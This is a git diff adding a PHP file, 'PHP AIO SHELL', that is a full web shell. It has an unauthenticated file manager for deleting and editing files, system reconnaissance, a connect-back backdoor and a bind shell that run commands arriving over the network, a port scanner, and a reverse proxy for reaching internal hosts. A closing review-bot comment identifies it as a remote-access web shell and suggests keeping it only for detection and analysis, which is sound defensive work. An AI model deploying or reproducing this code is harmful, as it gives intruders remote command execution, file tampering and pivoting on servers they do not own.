diff --git a/php/aioshell.php b/php/aioshell.php
new file mode 100644
index 0000000..4f44db4
--- /dev/null
+++ b/php/aioshell.php
@@ -0,0 +1,1204 @@
+';
+ $fp=@fopen($file_name, "r");
+ $data=@fread($fp, filesize($file_name));
+
+ echo '
+
+ ';
+ }
+ else {
+ $fp=@fopen($file_name, "w+");
+ $result=@fwrite($fp, $_POST['newcontent']);
+ @fclose($fp);
+ if ($result == false) {
+ echo "edit failed.";
+ }
+ else {
+ echo "edit ok.";
+ }
+ }
+}
+function rename_file($old_file_name, $new_file_name)
+{
+ if (file_exists($old_file_name) == false) {
+ echo "file $old_file_name not exist.\n";
+ return -1;
+ }
+ if (rename($old_file_name, $new_file_name) == false) {
+ echo "rename $old_file_name to $new_file_name failed.\n";
+ return -1;
+ }
+ echo "rename $old_file_name to $new_file_name ok.\n";
+ return 0;
+}
+function get_human_size($bytes)
+{
+ $type=array("Bytes", "KB", "MB", "GB", "TB");
+ $idx=0;
+ while ($bytes >= 1024) {
+ $bytes /= 1024;
+ $idx++;
+ }
+ return (intval($bytes)." ".$type[$idx]);
+}
+function get_file_perms($file_name)
+{
+ return (substr(sprintf('%o', fileperms($file_name)), -4));
+}
+function get_human_file_perms($file_name)
+{
+ $perms = fileperms($file_name);
+ if (($perms & 0xC000) == 0xC000) {
+ $info = 's';
+ } elseif (($perms & 0xA000) == 0xA000) {
+ $info = 'l';
+ } elseif (($perms & 0x8000) == 0x8000) {
+ $info = '-';
+ } elseif (($perms & 0x6000) == 0x6000) {
+ $info = 'b';
+ } elseif (($perms & 0x4000) == 0x4000) {
+ $info = 'd';
+ } elseif (($perms & 0x2000) == 0x2000) {
+ $info = 'c';
+ } elseif (($perms & 0x1000) == 0x1000) {
+ $info = 'p';
+ } else {
+ $info = 'u';
+ }
+ $info .= (($perms & 0x0100) ? 'r' : '-');
+ $info .= (($perms & 0x0080) ? 'w' : '-');
+ $info .= (($perms & 0x0040) ?
+ (($perms & 0x0800) ? 's' : 'x' ) :
+ (($perms & 0x0800) ? 'S' : '-'));
+ $info .= (($perms & 0x0020) ? 'r' : '-');
+ $info .= (($perms & 0x0010) ? 'w' : '-');
+ $info .= (($perms & 0x0008) ?
+ (($perms & 0x0400) ? 's' : 'x' ) :
+ (($perms & 0x0400) ? 'S' : '-'));
+ $info .= (($perms & 0x0004) ? 'r' : '-');
+ $info .= (($perms & 0x0002) ? 'w' : '-');
+ $info .= (($perms & 0x0001) ?
+ (($perms & 0x0200) ? 't' : 'x' ) :
+ (($perms & 0x0200) ? 'T' : '-'));
+ return $info;
+}
+function get_file_owner($file_name)
+{
+ $uid=fileowner($file_name);
+ $user_info = posix_getpwuid($uid);
+ return $user_info['name'];
+}
+function read_dir($dir_path)
+{
+ if (is_dir($dir_path)) {
+ if (($dp = opendir($dir_path)) == false) {
+ echo "open $dir_path failed.\n";
+ return -1;
+ }
+ while (($file_name = readdir($dp)) != false) {
+ if ($file_name == "." || $file_name == "..")
+ continue;
+ $sub_path = $dir_path."/".$file_name;
+ echo "$sub_path\n";
+ }
+ }
+ closedir($dp);
+ return 0;
+}
+function read_dirs($dir_path)
+{
+ echo '
+
+
+| Filename |
+Last modified |
+Size |
+Chmod/Perms |
+Action |
+
';
+ if (is_dir($dir_path)) {
+ if (($dp = opendir($dir_path)) == false) {
+ echo "open $dir_path failed.\n";
+ return -1;
+ }
+ while (($file_name = readdir($dp)) != false) {
+ if ($file_name == "." || $file_name == "..")
+ continue;
+ $sub_path = $dir_path."/".$file_name;
+ $last_modify_time=date("Y/m/d H:i:s", fileatime($file_name));
+ $file_size=filesize($file_name);
+ $file_size_string=get_human_size($file_size);
+ $file_perms=get_file_perms($file_name);
+ $file_perms_string=get_human_file_perms($file_name);
+ $file_owner=get_file_owner($file_name);
+
+ echo '
+ | '.$file_name.' |
+ '.$last_modify_time.' |
+ '.$file_size_string.' |
+ '.$file_perms.' / '.$file_perms_string.' / '.$file_owner.' |
+ Delete
+ Edit
+ Download
+ Rename
+ |
+
';
+ }
+ }
+ echo '
';
+ closedir($dp);
+ return 0;
+}
+function aio_directory()
+{
+ $curr_path=getcwd();
+ return read_dirs($curr_path);
+}
+function search_file_by_name($dir_path, $target_file)
+{
+ if (is_dir($dir_path)) {
+ if (($dp = opendir($dir_path)) == false) {
+ echo "open $dir_path failed.\n";
+ return -1;
+ }
+ while (($file_name = readdir($dp)) != false) {
+ if ($file_name == "." || $file_name == "..")
+ continue;
+ $sub_path = $dir_path."/".$file_name;
+ if (is_dir($sub_path)) {
+ search_file_by_name($sub_path, $target_file);
+ }
+ if (!strcmp($file_name, $target_file)) {
+ echo "found $target_file.\n";
+ closedir($dp);
+ return 0;
+ }
+ }
+ echo "not found $target_file.\n";
+ closedir($dp);
+ }
+ return -1;
+}
+/**
+ * show file attribute with cetern flag.
+ *
+ * @dir_path - directroy to search.
+ * @attr_flag - 0 readable.
+ * - 1 writeable.
+ * - 2 executable.
+ */
+function show_attr_file($dir_path, $attr_flag)
+{
+ if (is_dir($dir_path)) {
+ if (($dp = opendir($dir_path)) == false) {
+ echo "open $dir_path failed.\n";
+ return -1;
+ }
+ while (($file_name = readdir($dp)) != false) {
+ if ($file_name == "." || $file_name == "..")
+ continue;
+ $sub_path = $dir_path."/".$file_name;
+ if (is_dir($sub_path)) {
+ show_attr_file($sub_path, $attr_flag);
+ }
+
+ if ($attr_flag == 0) {
+ if (is_readable($file_name))
+ echo "$sub_path\n";
+ }
+ else if ($attr_flag == 1) {
+ if (is_writable($file_name))
+ echo "$sub_path\n";
+ }
+ else if ($attr_flag == 2) {
+ if (is_executable($file_name))
+ echo "$sub_path\n";
+ }
+ else {
+ echo "wrong attribute flag.\n";
+ break;
+ }
+ }
+ closedir($dp);
+ }
+ return 0;
+}
+function create_dir($dir_path)
+{
+ if (file_exists($dir_path))
+ return -1;
+ if (mkdir($dir_path, 0700) == false) {
+ echo "create $dir_path failed.\n";
+ return -1;
+ }
+ echo "create $dir_path ok.\n";
+ return 0;
+}
+function destroy_dir($dir_path)
+{
+ if (file_exists($dir_path) == false)
+ return -1;
+ if (rmdir($dir_path) == false) {
+ echo "delete $dir_path failed.\n";
+ return -1;
+ }
+ echo "delete $dir_path ok.\n";
+ return 0;
+}
+function destroy_dirs($dir_path)
+{
+ if (is_dir($dir_path)) {
+ if (($dp = opendir($dir_path)) == false) {
+ echo "open $dir_path failed.\n";
+ return -1;
+ }
+ while (($file_name = readdir($dp)) != false) {
+ if ($file_name == "." || $file_name == "..")
+ continue;
+ $sub_path = $dir_path."/".$file_name;
+ if (is_dir($sub_path)) {
+ destroy_dirs($sub_path);
+ }
+ else
+ delete_file($sub_path);
+ }
+ closedir($dp);
+ destroy_dir($dir_path);
+ return 0;
+ }
+ return 0;
+}
+function linux_id()
+{
+ $uid = posix_getuid();
+ $user_info = posix_getpwuid($uid);
+ echo "uid=".$uid."(".$user_info['name'].") ";
+ echo "gid=".$user_info['gid']."(".$user_info['name'].") ";
+ echo "dir=".$user_info['dir']." ";
+ echo "shell=".$user_info['shell']."\n";
+}
+function linux_uname()
+{
+ $uname = posix_uname();
+ echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." ";
+ echo $uname['version']." ".$uname['machine'];
+}
+function get_proc_name($file_name)
+{
+ $fp = fopen($file_name, "r");
+ if ($fp == false) {
+ echo "open $file_name failed.\n";
+ return -1;
+ }
+ while (($buf = fgets($fp, 1024)) != false ) {
+ if (strstr($buf, "Name:") != NULL) {
+ sscanf($buf, "%s %s", $tmp, $name);
+ fclose($fp);
+ return $name;
+ }
+ }
+ fclose($fp);
+ return 0;
+}
+function get_proc_cmd($file_name)
+{
+ $fp = fopen($file_name, "r");
+ if ($fp == false) {
+ echo "open $file_name failed.\n";
+ return -1;
+ }
+ $cmd = fgets($fp, 1024);
+ fclose($fp);
+ return $cmd;
+}
+function linux_ps()
+{
+ if (($dp = opendir("/proc")) == false) {
+ echo "open /proc failed.\n";
+ return -1;
+ }
+ echo "open /proc ok.\n";
+ while (($file_name = readdir($dp)) != false) {
+ if ($file_name == "." || $file_name == "..")
+ continue;
+ if (ctype_digit($file_name) == false)
+ continue;
+
+ $dir_path = "/proc/$file_name/status";
+ $proc_name = get_proc_name($dir_path);
+ $dir_path = "/proc/$file_name/cmdline";
+ $proc_cmd = get_proc_cmd($dir_path);
+ echo $file_name."\t\t".$proc_name." ".$proc_cmd."\n";
+ }
+ closedir($dp);
+ return 0;
+}
+function tcp_connect($host, $port)
+{
+ $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+ if ($socket == false) {
+ echo "create socket error.\n";
+ return -1;
+ }
+ if (@socket_connect($socket, $host, $port) == false) {
+ socket_close($socket);
+ return -1;
+ }
+ return $socket;
+}
+function tcp_connect_timeout($host, $port, $timeout)
+{
+ $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+ if ($socket == false) {
+ echo "create socket error.\n";
+ return -1;
+ }
+ if (socket_set_nonblock($socket) == false) {
+ echo "set nonblock error.\n";
+ socket_close($socket);
+ return -1;
+ }
+ $time = time();
+ while (!@socket_connect($socket, $host, $port)) {
+ $err = socket_last_error($socket);
+ if ($err == 115 || $err == 114) {
+ if ((time() - $time) >= $timeout) {
+ socket_close($socket);
+ echo "socket timeout.\n";
+ return -1;
+ }
+ sleep(1);
+ continue;
+ }
+ socket_close($socket);
+ return -1;
+ }
+
+ echo "connect to $host:$port ok.\n";
+ return $socket;
+}
+function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2)
+{
+ $socket1 = tcp_connect($remote_host1, $remote_port1);
+ if ($socket1 == -1) {
+ echo "connect to $remote_host1:$remote_port1 failed.\n";
+ return -1;
+ }
+ echo "connect to $remote_host1:$remote_port1 ok.\n";
+ $socket2 = tcp_connect($remote_host2, $remote_port2);
+ if ($socket2 == -1) {
+ echo "connect to $remote_host2:$remote_port2 failed.\n";
+ socket_close($socket1);
+ return -1;
+ }
+ echo "connect to $remote_host2:$remote_port2 ok.\n";
+ run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2);
+ return 0;
+}
+function web_proxy_client()
+{
+ echo '
+
+ Linux reverse proxy
+
+
+ ';
+ if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) ||
+ empty($_POST['public_host']) || empty($_POST['public_port']))
+ return -1;
+ run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'],
+ $_POST['public_host'], $_POST['public_port']);
+}
+function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2)
+{
+ while (true) {
+ $read_sockets = array($socket1, $socket2);
+ $write_sockets = NULL;
+ $except_sockets = NULL;
+ if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) {
+ echo "socket_select error ".socket_strerror(socket_last_error())."\n";
+ break;
+ }
+ if (in_array($socket2, $read_sockets)) {
+ //echo "got data from $remote_host2.\n";
+ $bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT);
+ if ($bytes2 == false) {
+ echo "socket_recv ".socket_strerror(socket_last_error($socket2))."\n";
+ break;
+ }
+ //echo "got bytes $bytes2.\n";
+ if ($bytes2 == 0) {
+ echo "recv no data from $remote_host2.\n";
+ break;
+ }
+ $ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR);
+ if ($ret2 == false) {
+ echo "socket_send ".socket_strerror(socket_last_error($socket1))."\n";
+ break;
+ }
+ if ($ret2 != $bytes2) {
+ echo "send data failed.\n";
+ break;
+ }
+ //echo "write $ret2 bytes ok.\n";
+ }
+ if (in_array($socket1, $read_sockets)) {
+ //echo "got data from $remote_host1.\n";
+ $bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT);
+ if ($bytes1 == false) {
+ echo "socket_recv ".socket_strerror(socket_last_error($socket1))."\n";
+ break;
+ }
+ //echo "got bytes $bytes1.\n";
+ if ($bytes1 == 0) {
+ echo "recv no data from $remote_host1.\n";
+ break;
+ }
+ $ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR);
+ if ($ret1 == false) {
+ echo "socket_send ".socket_strerror(socket_last_error($socket2))."\n";
+ break;
+ }
+ if ($ret1 != $bytes1) {
+ echo "send data failed.\n";
+ break;
+ }
+ //echo "write $ret1 bytes ok.\n";
+ }
+ }
+ echo "proxy done.\n";
+ socket_close($socket1);
+ socket_close($socket2);
+ return 0;
+}
+function init_proxy_server($local_port)
+{
+ $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+ if ($socket == false) {
+ echo "create socket error.\n";
+ return -1;
+ }
+ if (socket_bind($socket, '0', $local_port) == false) {
+ echo "bind sock error.\n";
+ socket_close($socket);
+ return -1;
+ }
+ if (socket_listen($socket) == false) {
+ echo "listen sock error.\n";
+ socket_close($socket);
+ return -1;
+ }
+ echo "listen on port $local_port ok.\n";
+ return $socket;
+}
+function run_proxy_server($local_port1, $local_port2)
+{
+ $socket1 = init_proxy_server($local_port1);
+ if ($socket1 == -1)
+ return -1;
+ while (true) {
+ if (($newsock1 = socket_accept($socket1)) !== false) {
+ socket_getpeername($newsock1, $ip1);
+ echo "got a client form $ip1\n";
+ break;
+ }
+ }
+ $socket2 = init_proxy_server($local_port2);
+ if ($socket2 == -1)
+ return -1;
+ while (true) {
+ if (($newsock2 = socket_accept($socket2)) !== false) {
+ socket_getpeername($newsock2, $ip2);
+ echo "got a client form $ip2\n";
+ break;
+ }
+ }
+ echo "start transmit data ...\n";
+ run_proxy_core($newsock2, $ip2, $newsock1, $ip1);
+ socket_close($socket2);
+ socket_close($socket1);
+ return 0;
+}
+function tcp_connect_port($host, $port, $timeout)
+{
+ $fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
+
+ return $fp;
+}
+function port_scan_fast($host, $timeout, $banner)
+{
+$general_ports = array(
+ '21'=>'FTP',
+ '22'=>'SSH',
+ '23'=>'Telnet',
+ '25'=>'SMTP',
+ '79'=>'Finger',
+ '80'=>'HTTP',
+ '81'=>'HTTP/Proxy',
+ '110'=>'POP3',
+ '135'=>'MS Netbios',
+ '139'=>'MS Netbios',
+ '143'=>'IMAP',
+ '162'=>'SNMP',
+ '389'=>'LDAP',
+ '443'=>'HTTPS',
+ '445'=>'MS SMB',
+ '873'=>'rsync',
+ '1080'=>'Proxy/HTTP Server',
+ '1433'=>'MS SQL Server',
+ '2433'=>'MS SQL Server Hidden',
+ '1521'=>'Oracle DB Server',
+ '1522'=>'Oracle DB Server',
+ '3128'=>'Squid Cache Server',
+ '3129'=>'Squid Cache Server',
+ '3306'=>'MySQL Server',
+ '3307'=>'MySQL Server',
+ '3500'=>'Squid Cache Server',
+ '3389'=>'MS Terminal Service',
+ '5800'=>'VNC Server',
+ '5900'=>'VNC Server',
+ '8080'=>'Proxy/HTTP Server',
+ '10000'=>'Webmin',
+ '11211'=>'Memcached'
+ );
+ echo '';
+
+ foreach($general_ports as $port=>$name) {
+ if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
+ if (empty($banner) == false) {
+ $data = fgets($fp, 128);
+ echo '
+ | '.$host.' |
+ '.$port.' |
+ '.$name.' |
+ '.$data.' |
+
';
+ }
+ else {
+ echo '
+ | '.$host.' |
+ '.$port.' |
+ '.$name.' |
+
';
+ }
+ fclose($fp);
+ }
+ }
+ echo '
';
+}
+function port_scan($host, $src_port, $dst_port, $timeout, $banner)
+{
+ echo '
+
+ | Host |
+ Port |
+ State |
+
';
+ for ($port = $src_port; $port <= $dst_port; $port++) {
+ if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
+ if (empty($banner) == false) {
+ $data = fgets($fp, 128);
+ echo '
+ | '.$host.' |
+ '.$port.' |
+ '.$data.' |
+
';
+ }
+ else {
+ echo '
+ | '.$host.' |
+ '.$port.' |
+ OPEN |
+
';
+ }
+ fclose($fp);
+ }
+ }
+ echo '
';
+}
+function run_portscan()
+{
+ echo '
+
+
+
+
+
+
+ ';
+ if (empty($_POST['scan_host']))
+ return -1;
+
+ if (isset($_POST['scan_fast'])) {
+ port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'],
+ $_POST['scan_banner']);
+ }
+ else {
+ port_scan($_POST['scan_host'], "1", "65535",
+ $_POST['scan_timeout'],
+ $_POST['scan_banner']);
+ }
+}
+function linux_exec($socket, $cmd)
+{
+ $handle = popen($cmd, "r");
+ while (($buf = fgets($handle, 1024)) != false) {
+ $ret = socket_write($socket, $buf, strlen($buf));
+ if ($ret == false) {
+ return -1;
+ }
+ }
+ pclose($handle);
+ return 0;
+}
+function connect_backdoor($host, $port)
+{
+ $banner = "connect back from phpshell\n";
+ $socket = tcp_connect($host, $port);
+ if ($socket == -1) {
+ echo "connect to $host:$port failed.\n";
+ return -1;
+ }
+ echo "connect to $host:$port ok.\n";
+ $ret = socket_write($socket, $banner, strlen($banner));
+ if ($ret == false) {
+ echo "write data failed.\n";
+ socket_close($socket);
+ return -1;
+ }
+ while (true) {
+ $buf = socket_read($socket, 1024);
+ echo $buf;
+ linux_exec($socket, $buf);
+ }
+}
+function bindshell($local_port)
+{
+ $banner = "bindshell from phpshell\n";
+ $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+ if ($socket == false) {
+ echo "create socket error.\n";
+ return -1;
+ }
+ if (socket_bind($socket, '0', $local_port) == false) {
+ echo "bind sock error.\n";
+ socket_close($socket);
+ return -1;
+ }
+ if (socket_listen($socket) == false) {
+ echo "listen sock error.\n";
+ socket_close($socket);
+ return -1;
+ }
+ echo "listen on port $local_port ok.\n";
+ while (true) {
+ if (($newsock = socket_accept($socket)) !== false) {
+ socket_getpeername($newsock, $ip);
+ echo "got a client form $ip"."
";
+ break;
+ }
+ }
+ $ret = socket_write($newsock, $banner, strlen($banner));
+ if ($ret == false) {
+ echo "write data failed.\n";
+ socket_close($newsock);
+ socket_close($socket);
+ return -1;
+ }
+ while (true) {
+ $buf = socket_read($newsock, 1024);
+ echo $buf;
+ linux_exec($newsock, $buf);
+ }
+ socket_close($newsock);
+ socket_close($socket);
+ return 0;
+}
+function run_backdoor()
+{
+ echo '
+ Linux connect backdoor
+
+
+ Linux bindshell backdoor
+
+ ';
+ if ($_POST['target_host'] && $_POST['target_port']) {
+ connect_backdoor($_POST['target_host'], $_POST['target_port']);
+ }
+ if ($_POST['bind_port']) {
+ bindshell($_POST['bind_port']);
+ }
+}
+/*
+function exec_shell($cmd)
+{
+ $handle = popen($cmd, "r");
+ while (($buf = fgets($handle, 1024)) != false) {
+ echo $buf;
+ }
+ pclose($handle);
+ return 0;
+}
+function run_shell()
+{
+ $host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
+ $uid = posix_getuid();
+ $user_info = posix_getpwuid($uid);
+ echo '
+
+
+
+
+ ';
+ }
+}
+*/
+function run_terminal_shell($cmd)
+{
+ $handle = popen($cmd, "r");
+ while (($buf = fgets($handle, 1024)) != false) {
+ $data .= $buf."";
+ }
+ pclose($handle);
+ return $data;
+}
+function aio_shell()
+{
+ $host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
+ $uid = posix_getuid();
+ $user_info = posix_getpwuid($uid);
+ $curr_path = getcwd();
+ $prompt=$user_info['name'].'@'.$host_name.':'.$curr_path;
+ echo '
+
+
+
+
+
+
+
+';
+}
+function webshell_main()
+{
+ if (isset($_GET['cmd'])) {
+ if ($_GET['cmd'] == "backdoor") {
+ run_backdoor();
+ }
+ if ($_GET['cmd'] == "shell") {
+ aio_shell();
+ }
+ if ($_GET['cmd'] == "portscan") {
+ run_portscan();
+ }
+ if ($_GET['cmd'] == "proxy") {
+ web_proxy_client();
+ }
+ }
+ else {
+ echo '
+
+
+
+ | show directorys |
+ connect backdoor |
+ port scan |
+ reverse proxy |
+ cmd shell |
+
+
+ ';
+ }
+}
+function aio_main()
+{
+ $uid = posix_getuid();
+ $user_info = posix_getpwuid($uid);
+ $uid_banner="uid=".$uid."(".$user_info['name'].") ".
+ "gid=".$user_info['gid']."(".$user_info['name'].") ".
+ "dir=".$user_info['dir']." ".
+ "shell=".$user_info['shell'];
+ $uname = posix_uname();
+ $uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ".
+ $uname['version']." ".$uname['machine'];
+ $server_addr=$_SERVER['SERVER_NAME'];
+ $server_port= $_SERVER['SERVER_PORT'];
+ $server_time=date("Y/m/d h:i:s",time());
+ $phpsoft=$_SERVER['SERVER_SOFTWARE'];
+ $php_version=PHP_VERSION;
+ $zend_version=zend_version();
+ $dis_func=get_cfg_var("disable_functions");
+ $safemode=@ini_get('safe_mode');
+ if ($safemode == false)
+ $safemode="On";
+ $cwd_path=getcwd();
+ $total_disk=disk_total_space("/");
+ $total_disk_gb=intval($total_disk/(1024*1024*1024));
+ $free_disk=disk_free_space("/");
+ $free_disk_gb=intval($free_disk/(1024*1024*1024));
+echo '
+
+
+
+
+PHP AIO SHELL
+
+
+
+| User: '.$uid_banner.' |
+'.$server_time.' |
+
+
+| Uname: '.$uname_banner.' |
+'.$server_addr.":".$server_port.' |
+
+
+
+Software: '.$phpsoft.' | PHP: '.$php_version.' | ZEND: '.$zend_version.'
+ | Safemode: '.$safemode.' | disfunc: '.$dis_func.'
+
+
+
+| Directroy: '.$cwd_path.' |
+Disk: total '.$total_disk_gb.'GB free '.$free_disk_gb.'GB |
+
+
+
+
+
+
+';
+ if ($_GET['cmd']) {
+ if ($_GET['cmd'] == "dir") {
+ aio_directory();
+ }
+ if ($_GET['cmd'] == "backdoor") {
+ run_backdoor();
+ }
+ if ($_GET['cmd'] == "shell") {
+ aio_shell();
+ }
+ if ($_GET['cmd'] == "portscan") {
+ run_portscan();
+ }
+ if ($_GET['cmd'] == "proxy") {
+ web_proxy_client();
+ }
+ }
+ if ($_GET['delete']) {
+ delete_file($_GET['delete']);
+ }
+ if ($_GET['edit']) {
+ edit_file($_GET['edit']);
+ }
+}
+aio_main();
+?>
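Review bot: The new file php/aioshell.php carries no header comment saying what it is, and the entry point `aio_main()` at the end of the hunk passes `$_GET['delete']` and `$_GET['edit']` straight to `delete_file()` and `edit_file()` with no access check in the visible lines, so anyone who can reach it on a PHP-enabled server can use every feature. `linux_exec()` hands data read from a socket to `popen()`, and `run_backdoor()`, `run_portscan()` and `web_proxy_client()` take hosts and ports from `$_POST`, so this is a remote-access web shell rather than an admin utility and should be reviewed and stored as one. If it is kept as an analysis sample, I would add a first-line comment such as `// SAMPLE: PHP web shell retained for detection and analysis; never place under a served document root.` and keep it under an extension the web server does not execute. The top of the file is not visible here (the hunk begins mid-string), so a gate defined there cannot be ruled out. Separately, `webshell_main()` is defined but never called in the lines shown.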